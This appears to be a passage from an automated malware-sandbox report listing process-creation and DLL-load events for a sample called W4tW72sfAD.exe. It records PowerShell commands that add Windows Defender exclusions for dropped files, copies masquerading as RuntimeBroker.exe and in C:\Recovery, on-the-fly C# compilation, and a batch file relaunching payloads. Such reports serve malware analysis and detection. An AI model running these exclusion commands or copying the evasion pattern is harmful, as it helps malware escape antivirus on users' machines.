                          Source: unknownProcess created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: unknownProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: unknownProcess created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
